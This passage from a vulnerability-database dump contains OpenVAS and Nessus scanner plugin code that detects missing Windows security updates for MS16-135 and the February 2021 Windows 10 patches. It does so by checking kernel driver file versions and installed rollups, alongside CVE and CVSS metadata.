See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809092\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-7214\", \"CVE-2016-7215\", \"CVE-2016-7218\", \"CVE-2016-7246\",\n \"CVE-2016-7255\");\n script_bugtraq_id(92835);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-09 10:09:34 +0530 (Wed, 09 Nov 2016)\");\n script_name(\"Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a important security\n update according to Microsoft Bulletin MS16-135\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - A kernel Address Space Layout Randomization (ASLR) bypass error.\n\n - The windows kernel-mode driver fails to properly handle objects in memory.\n\n - The windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to retrieve the memory address of a kernel object, run arbitrary code\n in kernel mode and to log on to an affected system and runs a specially crafted\n application that could exploit the vulnerabilities and take control of an\n affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 
x32/x64\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3199135\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/ms16-135\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2, winVistax64:3, win2008x64:3,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nbrVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\drivers\\Bowser.sys\");\nif(!winVer && !brVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"6.0.6002.19706\"))\n {\n Vulnerable_range1 = \"Less than 
6.0.6002.19706\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24028\"))\n {\n Vulnerable_range1 = \"6.0.6002.23000 - 6.0.6002.24028\";\n VULN1 = TRUE ;\n }\n else if(version_is_less(version:brVer, test_version:\"6.0.6002.19698\"))\n {\n Vulnerable_range2 = \"Less than 6.0.6002.19698\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:brVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24020\"))\n {\n Vulnerable_range2 = \"6.0.6002.23000 - 6.0.6002.24020\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.1.7601.23567\"))\n {\n Vulnerable_range2 = \"Less than 6.1.7601.23567\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.2.9200.22004\"))\n {\n Vulnerable_range2 = \"Less than 6.2.9200.22004\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18524\"))\n {\n Vulnerable_range1 = \"Less than 6.3.9600.18524\";\n VULN1 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"10.0.10240.16384\"))\n {\n Vulnerable_range1 = \"Less than 10.0.10240.16384\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.10586.0\", test_version2:\"10.0.10586.19\"))\n {\n Vulnerable_range1 = \"10.0.10586.0 - 10.0.10586.19\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.446\"))\n {\n Vulnerable_range1 = \"10.0.14393.0 - 10.0.14393.446\";\n VULN1 = TRUE ;\n }\n}\n\nif(VULN1)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\Win32k.sys\"+ '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' 
+ Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\drivers\\Bowser.sys\"+ '\\n' +\n 'File version: ' + brVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T16:11:18", "description": "The remote Windows host is missing a security update. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the Windows kernel that allows a local attacker, via a specially crafted application, to bypass the Address Space Layout Randomization (ASLR) feature and retrieve the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to execute arbitrary code in kernel mode. (CVE-2016-7215, CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the bowser.sys kernel-mode driver due to improper handling objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. 
(CVE-2016-7218)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-08T00:00:00", "type": "nessus", "title": "MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7214", "CVE-2016-7215", "CVE-2016-7218", "CVE-2016-7246", "CVE-2016-7255"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-135.NASL", "href": "https://www.tenable.com/plugins/nessus/94636", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94636);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-7214\",\n \"CVE-2016-7215\",\n \"CVE-2016-7218\",\n \"CVE-2016-7246\",\n \"CVE-2016-7255\"\n );\n script_bugtraq_id(\n 93991,\n 94000,\n 94004,\n 94063,\n 94064\n );\n script_xref(name:\"MSFT\", value:\"MS16-135\");\n script_xref(name:\"MSKB\", value:\"3198234\");\n script_xref(name:\"MSKB\", value:\"3194371\");\n script_xref(name:\"MSKB\", value:\"3197867\");\n script_xref(name:\"MSKB\", value:\"3197868\");\n script_xref(name:\"MSKB\", value:\"3197873\");\n script_xref(name:\"MSKB\", value:\"3197874\");\n script_xref(name:\"MSKB\", value:\"3197876\");\n script_xref(name:\"MSKB\", value:\"3197877\");\n script_xref(name:\"MSKB\", value:\"3198585\");\n script_xref(name:\"MSKB\", value:\"3198586\");\n script_xref(name:\"MSKB\", value:\"3200970\");\n script_xref(name:\"IAVA\", value:\"2016-A-0322\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)\");\n script_summary(english:\"Checks the version of ntoskrnl.exe or the installed rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. 
(CVE-2016-7218)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-135\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 
\"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-135';\nkbs = make_list(\n '3198234',\n '3194371',\n '3197867',\n '3197868',\n '3197873',\n '3197874',\n '3197876',\n '3197877',\n '3198585',\n '3198586',\n '3200970'\n\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24029\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19706\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.24021\", min_version:\"6.0.6002.23000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.19698\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n # 8.1 / 2012 R2\n smb_check_rollup(os:\"6.3\",\n sp:0,\n 
rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197873, 3197874)) ||\n # 2012\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197876, 3197877)) ||\n # 7 / 2008 R2\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197867, 3197868)) ||\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198585)) ||\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198586)) ||\n # 10 (1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3200970))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:46", "description": "The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24083, CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601354: Windows 10 Version 1803 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601354.NASL", "href": "https://www.tenable.com/plugins/nessus/146339", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146339);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601354\");\n script_xref(name:\"MSFT\", value:\"MS21-4601354\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601354: Windows 10 Version 1803 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24083,\n CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601354-os-build-17134-2026-04614869-9ce5-cc3b-655a-bc66eb7cb4b0\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbcfd44b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601354.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601354');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601354])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:46", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of 
privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. 
(CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. 
An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 